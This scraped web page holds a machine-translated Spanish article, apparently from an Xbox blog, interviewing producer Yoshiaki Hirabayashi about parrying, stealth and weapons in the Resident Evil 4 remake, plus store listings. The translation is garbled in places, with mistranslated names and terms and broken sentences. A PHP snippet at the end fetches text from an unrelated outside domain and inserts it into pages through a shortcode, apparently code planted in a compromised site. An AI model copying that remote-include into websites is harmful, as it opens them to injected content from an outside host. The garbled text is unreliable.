Abstracto



  • Hablamos con el productor Yoshiaki Hirabayashi para saber más sobre el combate y los enemigos por venir. Resident Evil 4 .

  • jugar nuevo Demostración de motosierra de Resident Evil 4 Xbox Serie X hoy

  • Resident Evil 4 Disponible para pre-pedido digital ahora en Xbox Store. estándar o la mejor edicion.



A principios de este año, marcamos Resident Evil 4 Como uno de los juegos más esperados que se lanzará en 2023, ¡y por una buena razón! Este remake no solo está a la altura del desafío monumental de seguir dos excelentes remakes recientes, residente mal 2 Y Resident Evil 3pero tiene como objetivo recuperar todo lo que el clásico de terror de supervivencia original ofreció cuando se lanzó por primera vez en 2005.


Recientemente, echamos un vistazo a algunas imágenes de juego previas al lanzamiento. Resident Evil 4 en acción, y no pudimos evitar notar que el combate parecía mucho más rápido de lo que recordábamos. Agacharse, esquivar y contraataques rápidos (y, por supuesto, patadas circulares) parecían golpear a gran velocidad. por supuesto, esto Es Ha pasado un minuto desde la última vez que jugamos de verdad. Para tener una mejor idea de cómo es el combate en el próximo juego, nos complace tener la oportunidad de hablar. Resident Evil 4 Productor Yoshiaki Hirabayashi para obtener más información.



Captura de pantalla de Resident Evil 4


“En primer lugar, acelerar el combate no era uno de nuestros objetivos: nuestro objetivo general era recrear el juego respetando el ritmo y el contenido del original”, explica Yoshiaki. “Creo que lo entenderás. RE4El equilibrio entre el terror y la acción, y los elementos que te brindan un descanso, son todos muy similares a los del original”.



Nuestro objetivo general era recrear el juego respetando el tempo y el contenido del original.



Yoshiaki mencionó que todos estos elementos de combate se han rediseñado, incluido el esquema de control, para ayudar a que la nueva versión se sienta más moderna, similar a los juegos creados hoy. “En lugar de ser rápido, el combate es más flexible”, dice.


Esta flexibilidad en el movimiento de Remake depende de los cambios realizados en los controles. Para preservar el ritmo del juego, el equipo de desarrollo ajustó el comportamiento del enemigo y el diseño del nivel ambiental para que coincidieran. Ser capaz de parar, por ejemplo, fue una característica que nació de estos ajustes a través de prueba y error.


“Nos preguntamos cómo podríamos recrear la pelea con cuchillos de Krauser para estar dentro del juego original”, dice. “A partir de ahí, sentimos que Perry generalmente se adaptaba a los sistemas del juego y lo implementamos a lo largo (del juego)… podrías encontrarte en una situación en la que el foco de la pelea está en el cuchillo. Depende del uso, así que si tienes alguna habilidad por encima de la parada, será muy útil, y el tiempo para lograr una parada con éxito dependerá del nivel de dificultad en el que esté configurado el juego”.



Captura de pantalla de Resident Evil 4


No solo puede entrar el cuchillo. residente mal 4 ho Se usa para atacar y parar, pero también se puede usar como un ataque de seguimiento para golpear a los enemigos que han sido golpeados, y si te acercas sigilosamente a un enemigo sin que te vean por detrás. También se puede usar para matar sigilosamente si es posible.


“El sigilo, aunque no es esencial para el juego, es un elemento importante que amplía las diferentes estrategias disponibles para ti. Sin embargo, es solo una de las opciones posibles”, continúa Yoshiaki. “Espero que cuando juegues, recuerdes que está disponible para ti y lo uses cuando creas que es una buena idea”.



“El sigilo, aunque no es parte integral del juego, es un elemento importante que amplía la variedad de estrategias disponibles para ti.



Aparte del cuchillo, también habrá algunas armas nuevas para que Leon empuñe esta vez, incluido un lanzador de rayos (que obviamente lanza un rayo) que se parecerá al lanzador de minas del juego original. ”Puedes usar el lanzador de virotes para atacar sin hacer ruido, y si recuperas los virotes disparados, puedes volver a usarlos. Además, es posible colocar explosivos en el cerrojo”, explica Yoshiaki.


El equipo también examinó cómo reaccionan y responden los enemigos a Leon. Por ejemplo, hacer posible que Leon se mueva mientras equipa un arma ahora permitirá una mayor flexibilidad en la forma en que los jugadores pueden enfrentarse a los enemigos. Hablando de eso, los enemigos también se han ajustado para responder a algunas de las nuevas formas en que los jugadores pueden controlar a Leon, usando su poder de más formas que en el juego original.



Captura de pantalla de Resident Evil 4


Un ejemplo que vimos de esto en acción fue en el punto del juego cuando Leon cargaba a Ashley. Acomodado dentro de una antigua capilla, innumerables fanáticos empuñando capiteles y arbustos de aspecto medieval rápidamente acudieron en tropel para rodearlo. Mientras corría y corría (y corría) de los enemigos, recargaba y disparaba rápidamente su pistola, hasta que se quedó sin munición. Se habría hecho por Leon si no fuera por algunas patadas giratorias rápidas y paradas con cuchillos.


También echamos un vistazo a algunas de las formas en que uno puede paralizar y ralentizar a estos enemigos. En un caso, uno de los fanáticos agarró a Ashley y comenzó a huir con ella. Con un rápido disparo en la parte posterior de su pierna, cayó de rodillas, derribando a Ashley y dejándolo expuesto a un rápido movimiento de bote (porque ¿por qué no?).


“Los puntos débiles de los enemigos en realidad jugaron un papel importante, y lo guardamos para la nueva versión”, dice Yoshiaki. “Golpear a los enemigos desde la distancia, como usar armas de fuego, y derrotar a los enemigos con ataques cuerpo a cuerpo después de apuntar a puntos específicos, son (todavía) posibles”.



Captura de pantalla de Resident Evil 4


El equipo de desarrollo no ajustó ninguna de las animaciones sobre cómo se despachaban los enemigos, por lo que todos tus enemigos pesados ​​favoritos caerán al suelo tal como lo recuerdas. En cambio, la atención se centra en mantener la variedad de ataques y métodos que se pueden usar para derrotarlos. ¿Como favorito personal? Yoshiyaki estaba ansioso por compartir.



“Los puntos débiles de los enemigos jugaron un papel importante en el original y lo guardamos para la nueva versión.



“Personalmente, me gusta usar la pistola principalmente para apuntar a las partes del cuerpo del enemigo, sin importar cuán cerca esté el enemigo, y despacharlo una vez que esté aturdido. Siga con un ataque cuerpo a cuerpo: espero que encuentre un estilo de juego que se adapte a sus necesidades”. preferencias, y espero que disfrutes de los controles innovadores, las estrategias ampliadas y ¡Lucharás contra enemigos aún más poderosos!


La mejor parte es que podemos comenzar a probar las nuevas estrategias antes del lanzamiento de hoy mismo. Resident Evil 4 A finales de este mes, gracias a una nueva demostración ahora disponible para los jugadores de Xbox Series X|S. Puedes recogerlo aquí..


Captura de pantalla de Resident Evil 4

encontrar. Resident Evil 4 23 de marzo de 2023 para Xbox Series X|S. estándar o la mejor edicion.





Edición de lujo de Resident Evil 4





xbox vivo


Edición de lujo de Resident Evil 4




©CAPCOM CO., LTD.






129







$69.99




Contenido extra: – Caja adjunta: ‘Oro’ – Caja adjunta: ‘Clásica’ – Amuleto: ‘Munición de pistola’ – Amuleto: ‘Hierba verde’ La Edición Deluxe contiene el juego principal y paquetes DLC adicionales que contienen los siguientes elementos. Incluye: – Atuendo de Leon & Ashley: ‘Casual’ – Atuendo de Leon & Ashley: ‘Romántico’ – Atuendo y filtro de Leon: ‘Héroe’ – Atuendo y filtro de Leon: ‘Villano’ – Accesorios de Leon: ‘Gafas de sol (deportivas)’ – Arma Deluxe: ‘ Sentinel Nine’ – Arma de lujo: ‘Skullshaker’ – ‘Original Var.’ Cambio de banda sonora – Mapa del tesoro: Supervivencia ampliada es solo el comienzo. Han pasado seis años desde el desastre biológico en Raccoon City. El agente Leon S. Kennedy, uno de los supervivientes del incidente, es enviado a rescatar a la hija secuestrada del presidente. Él la lleva a un pueblo europeo desierto, donde algo está terriblemente mal con los lugareños. Y se levanta el telón de esta historia de rescate audaz y terror aterrador donde la vida y la muerte, el terror y la catarsis chocan. Con una jugabilidad innovadora, una historia reimaginada y gráficos vívidamente detallados, Resident Evil 4 marca el renacimiento de un gigante de la industria. Revive la pesadilla que se convirtió en Survival Horror.










Resident Evil 4





xbox vivo


Resident Evil 4




CAPCOM CO., LTD.






261







$59.99




Contenido adicional: – Estuche adjunto: ‘Oro’ – Amuleto: ‘Munición de pistola’ Nota: Este producto también está disponible como parte de un paquete. Tenga cuidado para evitar compras duplicadas. La supervivencia es solo el principio. Han pasado seis años desde el desastre biológico en Raccoon City. El agente Leon S. Kennedy, uno de los supervivientes del incidente, es enviado a rescatar a la hija secuestrada del presidente. Él la lleva a un pueblo europeo desierto, donde algo está terriblemente mal con los lugareños. Y se levanta el telón de esta historia de rescate audaz y terror aterrador donde la vida y la muerte, el terror y la catarsis chocan. Con una jugabilidad innovadora, una historia reimaginada y gráficos vívidamente detallados, Resident Evil 4 marca el renacimiento de un gigante de la industria. Revive la pesadilla que se convirtió en Survival Horror.










Demostración de motosierra de Resident Evil 4





xbox vivo


Demostración de motosierra de Resident Evil 4




CAPCOM CO., LTD.






262








La supervivencia es solo el comienzo. Experimenta una muestra de Resident Evil 4, una reinvención del juego original lanzado en 2005. Esta demostración contiene una versión especialmente ajustada de la secuencia de apertura del juego y se puede jugar una y otra vez sin límite de tiempo. Con un juego innovador, una nueva historia y gráficos vívidamente detallados, puedes revivir una pesadilla de horror y supervivencia.








(function(d, s, id)
var js, fjs = d.getElementsByTagName(s)(0);
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = "https://connect.facebook.net/en_US/sdk.js";
js.async = true;
js.defer = true;
js.crossorigin = 'anonymous';
fjs.parentNode.insertBefore(js, fjs);
(document, 'script', 'facebook-jssdk'));
, 'Required' );


// Twitter Widget script
XboxUtils.isCookieClear(function ()
var tag = document.createElement('script');
tag.src = "//platform.twitter.com/widgets.js";
var firstScriptTag = document.getElementsByTagName('script')(0);
firstScriptTag.parentNode.insertBefore(tag, firstScriptTag);
, 'Required' );


// Bing Translate.
XboxUtils.isCookieClear(function ()
setTimeout(function(),0);
, 'Advertising' );

Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');